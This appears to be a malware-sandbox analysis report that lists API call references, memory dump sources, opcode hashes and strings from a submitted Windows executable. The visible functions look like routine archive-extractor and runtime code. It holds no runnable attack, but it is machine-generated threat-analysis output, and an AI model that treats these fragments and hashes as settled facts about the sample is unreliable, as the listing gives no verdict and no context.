• GetWindowRect.USER32(?,?), ref: 009AE2D8
• ShowWindow.USER32(?,00000005,?,00000000), ref: 009AE373
• ShowWindow.USER32(00000000,00000005), ref: 009AE394
Strings
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: Window$Show$H_prolog3_Rect
• String ID: RarHtmlClassName
• API String ID: 950582801-1658105358
• Opcode ID: 9523a65797da138e5cd34573b91b7eb38c9abdb25ed7dc6a7e052607106a756b
• Instruction ID: 1952d4d836a266e69f4b65ac2e226c98e4ba21616ad57689ed6b5d4237d53835
• Opcode Fuzzy Hash: 9523a65797da138e5cd34573b91b7eb38c9abdb25ed7dc6a7e052607106a756b
• Instruction Fuzzy Hash: CE414871909208EFDF119FA4DD89BAEBBB8EF49300F044059F904AB165DB319D41DBA1
APIs
  • Part of subcall function 009C3518: _free.LIBCMT ref: 009C3541
• _free.LIBCMT ref: 009C35A2
  • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
  • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
• _free.LIBCMT ref: 009C35AD
• _free.LIBCMT ref: 009C35B8
• _free.LIBCMT ref: 009C360C
• _free.LIBCMT ref: 009C3617
• _free.LIBCMT ref: 009C3622
• _free.LIBCMT ref: 009C362D
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction ID: fb7dabfbd69feccfd3fadb565d5a69cae7c57c63e22fd8b6bfa7992cc74cfd06
• Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction Fuzzy Hash: F911C971D50B84FBE630BBB0CC47FCB779CAF84700F40881DB29DA6152DA75A6058792
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,009B4DDA,009B4D3D,009B4FDE), ref: 009B4D76
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 009B4D8C
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 009B4DA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: c08f5f8c8f9bd0c38dd0113b672a2964720c75129c09bd437a3de0ac0bfd1d54
• Instruction ID: efba0528669a780bb26f2209d5c259ead08a5c70702eb18e1d620f430fa1a52d
• Opcode Fuzzy Hash: c08f5f8c8f9bd0c38dd0113b672a2964720c75129c09bd437a3de0ac0bfd1d54
• Instruction Fuzzy Hash: 23F04631F55A22AB0F228F745EC4BF623CCAAC533C3010538D602D62D2E620EC507692
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009BC5A2,009BC5A2,?,?,?,009C185A,00000001,00000001,C5E85006), ref: 009C1663
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009C185A,00000001,00000001,C5E85006,?,?,?), ref: 009C16E9
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C17E3
• __freea.LIBCMT ref: 009C17F0
  • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
• __freea.LIBCMT ref: 009C17F9
• __freea.LIBCMT ref: 009C181E
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: ac74df3a7a3dce14e0abd5e2c63ae314a410b9ab2853afbd391bd962dce89ab7
• Instruction ID: 148ec65ae133e915c0668478ad5843eda418128563321da099fc8681e3095b3d
• Opcode Fuzzy Hash: ac74df3a7a3dce14e0abd5e2c63ae314a410b9ab2853afbd391bd962dce89ab7
• Instruction Fuzzy Hash: 4D51D372E00216AFDB259F64CC41FBB77AAEB86750F29462CFC04D6142EB34DC90C65A
APIs
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 009A7B06
  • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
• LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B2A
• FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 009A7B44
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 009A7B57
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B67
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009A7B77
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 5c7f3c1f91a25717a54d2004570640aab609e310358491725dd242c212838e5f
• Instruction ID: b31204aa14a8f5fefccbb1f218c99e41b8e6aec4b339db82cf1182bf7792b990
• Opcode Fuzzy Hash: 5c7f3c1f91a25717a54d2004570640aab609e310358491725dd242c212838e5f
• Instruction Fuzzy Hash: 044149B651C3059BC704DFA9C8859ABBBE8FF98714F04491EF989C7210E730D948CBA6
APIs
• FileTimeToSystemTime.KERNEL32(?,?,1AC349C0,?,?,?,?,009CAA27,000000FF), ref: 009AF38A
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF399
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF3A7
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,009CAA27,000000FF), ref: 009AF3B5
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,009CAA27,000000FF), ref: 009AF3D0
• GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,009CAA27,000000FF), ref: 009AF3FA
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: Time$System$File$Format$DateLocalSpecific
• String ID:
• API String ID: 909090443-0
• Opcode ID: b6ff905f441b9be0c31071ccf19d5fcdcd9fa8e5a7b94d9e95b375a582d01281
• Instruction ID: cb8d2770ba9041a2525b11c13ec6111c476c08861900e6429056c51c28539176
• Opcode Fuzzy Hash: b6ff905f441b9be0c31071ccf19d5fcdcd9fa8e5a7b94d9e95b375a582d01281
• Instruction Fuzzy Hash: 233119B2915189AFDB20DFA5DD85FEF77ACFB49704F00412AF90AD6141EB34AA04CB60
APIs
• GetLastError.KERNEL32(?,?,009B9771,009B96CC,009B6A64), ref: 009B9788
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B9796
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B97AF
• SetLastError.KERNEL32(00000000,009B9771,009B96CC,009B6A64), ref: 009B9801
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 33d724237f94724da87b064e133e2ead0912f185721bfd904a3a1a4e24fb6e6d
• Instruction ID: a627093177a0cad7ce9752775bc7de3d43fc3dc73ed3fa18ec99fb3495143042
• Opcode Fuzzy Hash: 33d724237f94724da87b064e133e2ead0912f185721bfd904a3a1a4e24fb6e6d
• Instruction Fuzzy Hash: 2801F23227E311AEA6243FB47EE5AEA2BC8EB427B9731033AF621550E0EF114C40F141
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,009BB581,?,009DE088,?,009BAE80,?,009DE088,?,00000007), ref: 009C0009
                                                              • _free.LIBCMT ref: 009C003C
                                                              • _free.LIBCMT ref: 009C0064
                                                              • SetLastError.KERNEL32(00000000,009DE088,?,00000007), ref: 009C0071
                                                              • SetLastError.KERNEL32(00000000,009DE088,?,00000007), ref: 009C007D
                                                              • _abort.LIBCMT ref: 009C0083
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 8a9fe1556db3d208f171667625ab907194f022bf6947593d3d0fadb06c178356
                                                              • Instruction ID: ec1a5d3855f19f118c7b965a1a84a4cc8bb03ab130ed491bcc5b4ff8e4cc7b8b
                                                              • Opcode Fuzzy Hash: 8a9fe1556db3d208f171667625ab907194f022bf6947593d3d0fadb06c178356
                                                              • Instruction Fuzzy Hash: 84F0A436D58600E7D622B3786D0AF6B2A199BC2771F27011CF51CA2192EE348C42D226
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 009B3FDB
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009B3FF5
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B4006
                                                              • TranslateMessage.USER32(?), ref: 009B4010
                                                              • DispatchMessageW.USER32(?), ref: 009B401A
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 009B4025
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: bb09d32212737f114ed78b775e1cb45de432dce250955e9f4c2be803550ab35b
                                                              • Instruction ID: 1a7d39439d938834c644f254017c400595f382cebd80b496fa233856dcc5eead
                                                              • Opcode Fuzzy Hash: bb09d32212737f114ed78b775e1cb45de432dce250955e9f4c2be803550ab35b
                                                              • Instruction Fuzzy Hash: 86F04F72E05129BBCF20ABE1EC4CEDFBF6DEF453A2B004011F60AE6050E6349941DBA1
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000066), ref: 009B26A9
                                                              • SendMessageW.USER32(00000000,00000143,00000000,009E5380), ref: 009B26D6
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B2702
                                                              Strings
                                                              • ProgramFilesDir, xrefs: 009B25E0
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 009B25F4
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 3888421826-2634093826
                                                              • Opcode ID: e14eb9f574143db7025d464889ed8b94c38af4221216b74f3b783cda5df468c6
                                                              • Instruction ID: 65453f4c9bccc730fba4b2d76a940c0f0be877f52f215e70aafadbf38113a69a
                                                              • Opcode Fuzzy Hash: e14eb9f574143db7025d464889ed8b94c38af4221216b74f3b783cda5df468c6
                                                              • Instruction Fuzzy Hash: 3C817C31900259EEDF24EBE4C991BEDB7B8BF58320F54009AE506B7191EB705F89CB61
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$H_prolog3
                                                              • String ID: &nbsp;$<br>
                                                              • API String ID: 1035939448-26742755
                                                              • Opcode ID: 1943c9867c88ea8f3363b2ab21fa32077815502d618b1074a5268760e2965880
                                                              • Instruction ID: aaeee323e167f15d00af69f25431ef6c111a20cf9ab53f46d0a169cecd726216
                                                              • Opcode Fuzzy Hash: 1943c9867c88ea8f3363b2ab21fa32077815502d618b1074a5268760e2965880
                                                              • Instruction Fuzzy Hash: 8B412A30B022159BDB259F54C981B3D7736FF96714F60842EE4079BAC1EBB19A82CBD1
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 009B07F5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 009B081A
                                                              • DeleteObject.GDI32(00000000), ref: 009B084C
                                                              • DeleteObject.GDI32(00000000), ref: 009B086F
                                                                • Part of subcall function 009AEBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009B0845,00000066), ref: 009AEBE6
                                                                • Part of subcall function 009AEBD3: SizeofResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEBFD
                                                                • Part of subcall function 009AEBD3: LoadResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC14
                                                                • Part of subcall function 009AEBD3: LockResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC23
                                                                • Part of subcall function 009AEBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009B0845,00000066), ref: 009AEC3E
                                                                • Part of subcall function 009AEBD3: GlobalLock.KERNEL32(00000000), ref: 009AEC4F
                                                                • Part of subcall function 009AEBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009AEC73
                                                                • Part of subcall function 009AEBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009AECB8
                                                                • Part of subcall function 009AEBD3: GlobalUnlock.KERNEL32(00000000), ref: 009AECD7
                                                                • Part of subcall function 009AEBD3: GlobalFree.KERNEL32(00000000), ref: 009AECDE
                                                              Strings
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 5eef2298cf93a8f9886372283454ca14a7c0942c1fae756437a58ec7bb609dc9
                                                              • Instruction ID: 6bba30787aca87d181f1e026b8222897983a311a0580e655107f04721836f7c7
                                                              • Opcode Fuzzy Hash: 5eef2298cf93a8f9886372283454ca14a7c0942c1fae756437a58ec7bb609dc9
                                                              • Instruction Fuzzy Hash: 4601D232944215B7E71177A49D4ABBF7A7EEFC1B66F040024F900AB2D1DB728D0596E1
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009BECE0,00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002), ref: 009BED4F
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009BED62
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,009BECE0,00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002), ref: 009BED85
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: ab9ccdb24a3b0d2ca6075ba2e95847b2801c57e5c4aebfa7c065b4f27dd0e114
                                                              • Instruction ID: 34b32fb7a8aa5bd08da1ac9927c418543f30db8df24ef98b3be3ecf138276337
                                                              • Opcode Fuzzy Hash: ab9ccdb24a3b0d2ca6075ba2e95847b2801c57e5c4aebfa7c065b4f27dd0e114
                                                              • Instruction Fuzzy Hash: 3FF03175E15108FBCF159FA4DC59FDDBFB9EB44725F400169E809A2190CB708941DA50
                                                              APIs
                                                                • Part of subcall function 009A6C5E: __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                                • Part of subcall function 009A6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009A50B3
                                                              • GetProcAddress.KERNEL32(009E51F8,CryptUnprotectMemory), ref: 009A50C3
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 270589589-1753850145
                                                              • Opcode ID: cb0065f38ba5b6b16f7980fccbb86840c1d6aaa5ef9f2581a1e09c3f0fa694e4
                                                              • Instruction ID: 168d9809ed501d15569d344b8dc7ee283507be9fe72f9ed4429456fd42a90252
                                                              • Opcode Fuzzy Hash: cb0065f38ba5b6b16f7980fccbb86840c1d6aaa5ef9f2581a1e09c3f0fa694e4
                                                              • Instruction Fuzzy Hash: 02E04FB0D14711DECB309B74DC08F467ED89F45718F05882DE4DE93581D6B4E4808B91
                                                              APIs
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 5ec9e15f4eb8db58ff671426cd5cae9c35436b6608fa7acd1a22cdea095aa8b8
                                                              • Instruction ID: a6f227e386d2f272d90470205cd370204f020a56d0d934d596d7e402032545a7
                                                              • Opcode Fuzzy Hash: 5ec9e15f4eb8db58ff671426cd5cae9c35436b6608fa7acd1a22cdea095aa8b8
                                                              • Instruction Fuzzy Hash: E351F472A21206AFDB298F54CA41BFAB7A8FF80330F14452DEE4597291E735EC84C790
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099F3C5
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0099B749,?,?,?,?,?,?), ref: 0099F450
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0099F4A7
                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 0099F569
                                                              • CloseHandle.KERNEL32(?), ref: 0099F570
                                                              Similarity
                                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                                              • String ID:
                                                              • API String ID: 4002707884-0
                                                              • Opcode ID: 77b14ac0041314c3b43025946d7f71b02ed779a78d297dc20e8e3d35aa93d214
                                                              • Instruction ID: 106203d87bfa60318717eb5cb4a888337e38c167ce53c6cb658a79ad425a91b6
                                                              • Opcode Fuzzy Hash: 77b14ac0041314c3b43025946d7f71b02ed779a78d297dc20e8e3d35aa93d214
                                                              • Instruction Fuzzy Hash: 5651BE70E04249AAEF10DFE8D899BEEFBB9AF49310F240129F441F7280D7349A45CB25
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 009C2BE9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C2C0C
                                                                • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009C2C32
                                                              • _free.LIBCMT ref: 009C2C45
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009C2C54
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 4e69c4c899f228534b8b0a4b6d59aa1f03c227730b856768ee25a66d66ffe58e
                                                              • Instruction ID: 8a98bb08c0d591f814ffb7babcec49e3a7ef75e3786ba93204e399c58bab1651
                                                              • Opcode Fuzzy Hash: 4e69c4c899f228534b8b0a4b6d59aa1f03c227730b856768ee25a66d66ffe58e
                                                              • Instruction Fuzzy Hash: 2201F7B2E05210BF332527775C8CE7F7E6DDEC6B61318016CF948D2111DA60CC01A2B2
                                                              APIs
                                                              • GetLastError.KERNEL32(009B535E,009B535E,?,009C01D8,009C0451,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?), ref: 009C008E
                                                              • _free.LIBCMT ref: 009C00C3
                                                              • _free.LIBCMT ref: 009C00EA
                                                              • SetLastError.KERNEL32(00000000,?,009B535E), ref: 009C00F7
                                                              • SetLastError.KERNEL32(00000000,?,009B535E), ref: 009C0100
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: c7982a5f66f5be1dfa5e4e658dc38a375327207b1d3feefab609111a700361b1
                                                              • Instruction ID: 0f5e7fbf6e9767242be64746fb9725457ddaf48f0bdc43d0ac8662c3c23803ce
                                                              • Opcode Fuzzy Hash: c7982a5f66f5be1dfa5e4e658dc38a375327207b1d3feefab609111a700361b1
                                                              • Instruction Fuzzy Hash: 4901F972E59700EB9722F7745D45F2B261EAFC1371F23002CF509A2192EE748C41E223
                                                              APIs
                                                              • _free.LIBCMT ref: 009C34C7
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009C34D9
                                                              • _free.LIBCMT ref: 009C34EB
                                                              • _free.LIBCMT ref: 009C34FD
                                                              • _free.LIBCMT ref: 009C350F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 3d74de1078747aa7f6502fd502ce0f5229169ba35b19dbe1e0511a05977b6959
                                                              • Instruction ID: fbeca5a02d49461dd563ec05b36c09244bc992db8c058ad5904bfbd523b5a9b1
                                                              • Opcode Fuzzy Hash: 3d74de1078747aa7f6502fd502ce0f5229169ba35b19dbe1e0511a05977b6959
                                                              • Instruction Fuzzy Hash: 51F0FF32929250E79724FB68F486F1677DDABC4710759880EF409E7911CB70FD808661
                                                              APIs
                                                              • _free.LIBCMT ref: 009BF7DE
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009BF7F0
                                                              • _free.LIBCMT ref: 009BF803
                                                              • _free.LIBCMT ref: 009BF814
                                                              • _free.LIBCMT ref: 009BF825
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 0e656401fff6d14e5e358bafb97341ce9c3fbe594e9eff978f3424f715a8e2c1
                                                              • Instruction ID: 11c749d7dfe71ae07224284b2a33a1ba57b57665006435397226008e19ee7f63
                                                              • Opcode Fuzzy Hash: 0e656401fff6d14e5e358bafb97341ce9c3fbe594e9eff978f3424f715a8e2c1
                                                              • Instruction Fuzzy Hash: A1F05475839390CBAB11BF24BD82A4477A5F775764702011FF0196A271CB721C41EB92
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 009B31A4
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Strings
                                                              Memory Dump Source
